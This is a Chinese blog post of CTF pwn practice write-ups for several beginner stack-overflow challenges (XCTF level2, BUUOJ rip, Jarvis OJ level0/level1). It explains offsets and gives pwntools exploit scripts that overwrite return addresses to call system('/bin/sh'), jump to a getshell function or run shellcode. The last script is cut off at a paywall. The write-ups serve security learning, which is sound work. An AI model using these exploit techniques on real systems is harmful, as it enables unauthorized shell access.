pwn 练习5月份

已于 2022-06-04 09:12:17 修改
阅读量588 收藏 1
点赞数
分类专栏: 笔记 ctf 文章标签: 安全 网络安全 c++ c语言
于 2022-05-18 11:32:02 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zip471642048/article/details/124838882
版权

文章目录

level2

题目地址 : https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=0&id=5055&page=1

buf的大小是0x88,但是给了0x100所以会造成溢出

在这里插入图片描述
正好有/bin/sh字符,也有system函数,那我们只需要找到他两的地址构造rop就行
在这里插入图片描述
/bin/sh => 0x0804A024 systme_addr => 0x08048320
在这里插入图片描述
在这里插入图片描述
exp

from pwn import *
io = remote("111.200.241.244",59420)
#sh = process('./test')
#elf = ELF('./test')

sys_addr = 0x08048320
bin_addr = 0x0804a024
payload = 'a'*(0x88 + 0x4) +p32(sys_addr) +p32(0) + p32(bin_addr)
io.sendline(payload)

io.interactive()

在这里插入图片描述

test_your_nc

题目地址 : https://buuoj.cn/challenges#test_your_nc

直接给shell的签到题
在这里插入图片描述
在这里插入图片描述

rip

题目地址 : https://buuoj.cn/challenges#rip
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
f

un函数的地址是0x00401186

在这里插入图片描述

从gets溢出到rbp是15个字符,总共要构造的15+8个字符串

在这里插入图片描述
在这里插入图片描述
exp

from pwn import *

sh = process('./pwn1')


fun_addr = 0x00401186
payload = 'a'*15 #get溢出到rbp到长度
payload += 'r'*8 #64位rbp到长度是8 32位ebp是4
payload += p64(fun_addr)#getshell函数的地址,让rsp指向他
sh.sendline(payload)
sh.interactive()

可以看到在本地是可以getshell的,但是远端服务器却不行

在这里插入图片描述
在这里插入图片描述

payload 利用retn实现堆栈平衡
payload1 利用retn直接返回fun函数
payload2 利用+1实现堆栈平衡

rom pwn import *


#sh = process('./pwn1')
sh = remote("node4.buuoj.cn",26658)

fun_addr = 0x00401186 #getshell function
bin_sh_addr = 0x0401186
payload = 'a'*15+"a"*8 + p64(0x004011FC) + p64(fun_addr)
payload1 = 'a'*15 + p64(bin_sh_addr)
payload2 = 'a'*15+'a'*8+p64(fun_addr+1)
sh.sendline(payload2)
sh.interactive()

[XMAN]level0

题目地址 : https://www.jarvisoj.com/challenges

64位程序只开了nx

在这里插入图片描述
在这里插入图片描述
程序还有一个callsystem函数是一个getshell函数
在这里插入图片描述
距离rbp有128 到rip到距离是 128+8(32位是4字节 64位是8字节)
在这里插入图片描述

  1 from pwn import *
  2 
  3                                                                             
  4 #sh = process('./level0')
  5 sh = remote('pwn2.jarvisoj.com',9881)
  6 getshell = 0x00400596
  7 payload = b'a'*136 + p64(getshell+1) #+1是为了堆栈平衡
  8 sh.sendline(payload)
  9 sh.interactive()

[XMAN]level1

题目地址 : https://www.jarvisoj.com/challenges
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

本题构造shellcode溢出到rsp的retn返回到buf的地址执行shellcode,因为nx保护未开启,所以栈上的数据也是能够执行命令的

exp

  1 from pwn import *
  2 #io = process('./level1')
  3 io = remote("pwn2.jarvisoj.com", 9877)
  4 shellcode = asm(shellcraft.sh())
  5 buffer = io.recvline()[14:-2]
  6 buf_addr
最低0.47元/天 解锁文章
[mzq]
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pwn入门题目汇总.rar
09-01
pwn入门题目汇总.rar
PWN测试题目
07-18
信息安全PWN测试题目:用于CTF的练习PWN的学习,测试题目。
pwn100题目文件及exp.zip
08-09
栈溢出漏洞,没有system函数下需要使用DynELF函数来泄漏函数地址,本资源是利用read和puts函数来进行泄漏
第二届祥云杯高校组决赛Pwn题-----Easypwn
qq_43710556的博客
10-20 338
记录参加的第二届祥云杯决赛的一道简单Pwn题,主要考察了bypass canary&&python调用C语言库函数,当时还没做出来,太菜了 查看一下程序的保护措施,发现只开启了Canary保护,并且是Partial RELRO 通过IDA分析,程序主要的逻辑有: (1) 通过prelogue调用rand()函数生成8位的密码,保存在bss段上,并且随机数的种子是time(0) (2) 看到gets函数,明显的栈溢出,但是因为存在canary,并且无法通过gets函数泄露canary,所
攻防世界 Pwn pwn-100
MrTreebook的博客
12-12 609
攻防世界 Pwn pwn-1001.题目下载地址2.checksec3.IDA分析4.exp 1.题目下载地址 点击下载 2.checksec 64位程序,目前还什么都看不出看来,直接拉近IDA看看 3.IDA分析 整个程序由3个嵌套的程序组成 我们可以看到sub_40063D是主要的程序,接受单个字符并存储到传入的参数a1所指向的空间之内 同时分析sub_40068E发现sub_40063D中a1就是sub_40068E中的v1 并且v1的栈空间大小就只有0x40,而sub_4006
pwn1 一道pwn练习
05-07
pwn练习
一道pwn入门的练习
10-23
直接以一个非常简单的栈溢出例子(基于Linux)来讲解pwn所要用到的一些常用的工具及命令的用例
pwn练习附件四道题含exp
11-21
个人pwn练习题目https://blog.csdn.net/yusakul/article/details/103147299,含exp,推荐去原链接下载:https://bbs.ichunqiu.com/thread-42241-1-1.html
CTF-PWN练习之执行Shellcode
ChuMeng1999的博客
01-05 1518
目录预备知识一、相关实验二、Shellcode三、执行Shellcode实验目的实验环境实验步骤一源码审计实验步骤二使用gdb调试程序实验步骤三发起溢出攻击 预备知识 本实验要求实验者具备如下的相关知识。 一、相关实验 本实验要求您已经认真学习和完成了《CTF PWN练习之返回地址覆盖》。 二、Shellcode Shellcode指缓冲区溢出攻击中植入进程的恶意代码,这段代码可以弹出一个消息框,也可以在目标机器上打开一个监听端口,甚至是删除目标机器上的重要文件等。 Shellcode通常需要使用汇编语言进
pwn栈溢出10道练习题有writeup
01-04
pwn栈溢出练习题目,每题都有writeup.
BuckeyeCTF 2023 pwn Frog Universe in C (FUC) (最浪漫的一题)
最新发布
YX-hueimie
10-02 393
这道题是我目前做过的最浪漫的一道pwn题了,做到后面越来越激昂,有种杀穿银河的感觉,题目的描述是一首英文小诗:进入由比特与字节组成的银河。在群星之间,你将对抗死亡。即使没有呼吸,你还会继续前行吗?夜晚的青蛙呱呱地叫。对你来说,群星和跳跃者是一种诅咒。如果你先搜索广度,他们会消耗你。如果你先搜索深度,他们仍然会赢。在零和一之间,你会找到光明吗?用字符自由地喂养宇宙。你慷慨的喂养会使你移动。你能毫不犹豫地穿过危险吗?危机已经弥漫开来了。。。缓冲区中有漏洞待发现。
pwn 栈溢出例子与ida的远程调试
你和萤火虫有两个共同点,在我的眼里都会发光,同时,都已经很多年没见了
12-22 1678
听说ida的全套工具一个不小心泄漏了,价值2万dollar,读书人最见不得这种赤裸裸地浪费,赶紧把二进制摆上日常了。 本地 首先找个c代码做为测试用例,必须是hello world: #include <stdio.h> void hello_world() { char buf[64] = {0}; scanf("%s", &buf); printf("Hello %s\n", &buf); } // 方便测试,留个后门函
pwn三连
qq_43613144的博客
07-24 334
‘’
BUUCTF PWN 刷题 1-15题
农夫果园好好喝的博客
08-21 2141
经典栈溢出漏洞。
xctf攻防世界pwn基础题解(新手食用)
热门推荐
Spwpun的博客
05-01 2万+
文章目录CGFsb status:updating… CGFsb 前面的那一道get_shell的题算是做pwn题的一般流程:下载文件,ida查看代码,分析漏洞,利用漏洞写出exp,最常用的是用到python的pwntools,然后使用nc或者pwntools连接到虚拟场景实现漏洞攻击得到flag。 本题的思路基本一致,使用pwntools编写漏洞利用脚本,这里的漏洞是格式化字符串漏洞,文章分...
PwnTheBox(web篇)简单题
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
04-26 3047
PwnTheBox(web篇)简单题 第一页 exec1 hackergame2019-签到题 网页读取器 管理员本地访问 下载下载 快速计算 该网站已经被黑 PwnTheBox 百度网盘分享链接 Get Post 睿智题目 一道很奇怪的题目 奇葩的题目 验证码 XSS 达拉崩吧大冒险 atchap php是世界上最好的语言 exec2 第二页 Twice SQL Injection 猫咪银行 黑曜石浏览器 信息安全
buuctf pwn 第五空间决赛pwn5
09-28
buuctf pwn 第五空间决赛pwn5是一个CTF pwn题,它涉及到格式化字符串漏洞。格式化字符串漏洞是一种常见的安全漏洞,利用这个漏洞可以读取或修改程序的内存中的数据,从而导致程序行为异常或者攻击者获取敏感信息。在这个题目中,攻击者可以通过构造特定的输入来修改程序中的变量,进而获取shell权限。具体的payload可以参考引用和引用中的代码示例。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值